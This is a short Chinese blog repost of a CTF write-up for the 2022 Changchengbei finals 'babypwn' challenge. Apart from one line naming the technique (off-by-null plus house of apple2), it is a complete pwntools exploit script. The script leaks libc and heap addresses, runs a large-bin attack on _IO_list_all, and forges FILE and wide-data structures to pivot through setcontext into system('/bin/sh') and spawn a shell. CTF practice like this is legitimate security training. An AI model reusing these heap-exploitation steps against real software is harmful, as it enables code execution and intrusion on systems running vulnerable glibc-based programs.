其他分享
首页 > 其他分享> > 2022_长城杯决赛_babypwn

2022_长城杯决赛_babypwn

作者:互联网

babypwn

漏洞利用

off by null + house of apple2

EXP

'''
Author: 7resp4ss
Date: 2022-09-06 09:11:16
LastEditTime: 2022-09-06 15:30:23
Description: 
'''
from pwn import *

p = process('./pwnf')
context.log_level = 'debug'
libc = ELF('./libc.so.6')
context.arch = 'amd64'
def cmd(choice):
    p.sendlineafter('>>',str(choice))

def add(size,cont):
    cmd('a')
    p.sendlineafter('length:',str(size))
    p.sendafter('input',str(cont))


def edit(idx,cont):
    cmd('e')
    p.sendlineafter('index:',str(idx))
    p.sendlineafter('input',str(cont))



def show(idx):
    cmd('s')
    p.sendlineafter('index:',str(idx))


def free(idx):
    cmd('d')
    p.sendlineafter('index:',str(idx))


add(0x4f8,'fxxk') #0
add(0x298,'fxxk') #1
add(0x4f8,'fxxk') #2 
add(0xf3f8,'fxxk') #3
add(0x90,'fxxk') # 4



free(1)
free(0)
add(0x4f7,'a'*0x4f0 + p32(0x500)) #0
free(2)
add(0x4f8,'a'*0x4f0 + p64(0x500 + 0x2a0 + 0x500)) #2
free(0)
free(3)

#now the idx 1 is uaf


free(4)
add(0x590 + 0x200,'fxxk') #0 0x5a1
show(1)
leak = u64(p.recvuntil('\x7f',False)[-6:].ljust(8,'\x00')) - 96
libc.address = leak - libc.sym['__malloc_hook'] - 0x10
IO_file = libc.sym['_IO_list_all']
_IO_wfile_jumps = libc.sym['_IO_wfile_jumps']
__free_hook = libc.sym['__free_hook']


log.info('libc_base -->>' + str(hex(libc.address)))
log.info('IO_file -->>' + str(hex(IO_file)))
log.info('_IO_wfile_jumps -->>' + str(hex(_IO_wfile_jumps)))
 #---largebinattack

add(0x4b0,'fxxk') #2
add(0xb0,'fxxk') #3
add(0x4c0,'fxxk') #4
payload = p64(0)
payload+= p64(IO_file - 0x20)
payload+= p64(0)
payload+= p64(IO_file - 0x20)
free(2)
show(1)
p.recvuntil('content:')
heap_base = (u64(p.recv(6) + '\x00'*2) & 0xfffffffffffff000) - 0x1000
log.info('heap_base -->>' + str(hex(heap_base)))

add(0x4fc,'fxxk') #2

edit(1,payload)

free(4)


add(0x4f0,'fxxk') #4
add(0x4b0,'aaa')

new_size = next(libc.search(b'/bin/sh'))

#gdb.attach(p,'b *$rebase(0xfb9)')
#sleep(1)

fake_wide = heap_base + 0x1960 #idx 4

payload = ''
payload = flat(
    {
        0xc8:p64(libc.sym['_IO_wfile_jumps']),
        0x90:p64(fake_wide),
        0x98:p64(0x00000000000008aa + libc.address),
        0x58:p64(fake_wide + 0xe0)
    }
)


edit(1,payload) #fake_IO_file

payload = ''
payload = flat(
    {
        0x0:p64(libc.sym['system']), 
		0x18:p64(0),
		0x30:p64(0),
        0x130:p64(fake_wide + 0x100),
        0x168:p64(libc.sym['setcontext' ] + 53) ,
        0xe0:'/bin/sh\x00'
    }
)
edit(4,payload)


cmd('q')


p.interactive()

标签:决赛,IO,p64,libc,free,add,2022,babypwn,fxxk
来源: https://www.cnblogs.com/7resp4ss/p/16676831.html